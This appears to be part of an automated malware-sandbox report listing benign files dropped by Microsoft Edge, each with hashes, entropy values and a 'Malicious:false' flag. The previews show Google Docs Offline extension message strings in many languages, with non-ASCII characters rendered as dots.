                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):977
                                Entropy (8bit):4.867640976960053
                                Encrypted:false
                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                MD5:9A798FD298008074E59ECC253E2F2933
                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3107
                                Entropy (8bit):3.535189746470889
                                Encrypted:false
                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                Malicious:false
                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1389
                                Entropy (8bit):4.561317517930672
                                Encrypted:false
                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1763
                                Entropy (8bit):4.25392954144533
                                Encrypted:false
                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):930
                                Entropy (8bit):4.569672473374877
                                Encrypted:false
                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):913
                                Entropy (8bit):4.947221919047
                                Encrypted:false
                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):806
                                Entropy (8bit):4.815663786215102
                                Encrypted:false
                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                MD5:A86407C6F20818972B80B9384ACFBBED
                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                Malicious:false
                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):883
                                Entropy (8bit):4.5096240460083905
                                Encrypted:false
                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1031
                                Entropy (8bit):4.621865814402898
                                Encrypted:false
                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                MD5:D116453277CC860D196887CEC6432FFE
                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1613
                                Entropy (8bit):4.618182455684241
                                Encrypted:false
                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):851
                                Entropy (8bit):4.4858053753176526
                                Encrypted:false
                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):851
                                Entropy (8bit):4.4858053753176526
                                Encrypted:false
                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):848
                                Entropy (8bit):4.494568170878587
                                Encrypted:false
                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1425
                                Entropy (8bit):4.461560329690825
                                Encrypted:false
                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                Malicious:false
                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):961
                                Entropy (8bit):4.537633413451255
                                Encrypted:false
                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):959
                                Entropy (8bit):4.570019855018913
                                Encrypted:false
                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                MD5:535331F8FB98894877811B14994FEA9D
                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):968
                                Entropy (8bit):4.633956349931516
                                Encrypted:false
                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):838
                                Entropy (8bit):4.4975520913636595
                                Encrypted:false
                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                Malicious:false
                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1305
                                Entropy (8bit):4.673517697192589
                                Encrypted:false
                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):911
                                Entropy (8bit):4.6294343834070935
                                Encrypted:false
                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
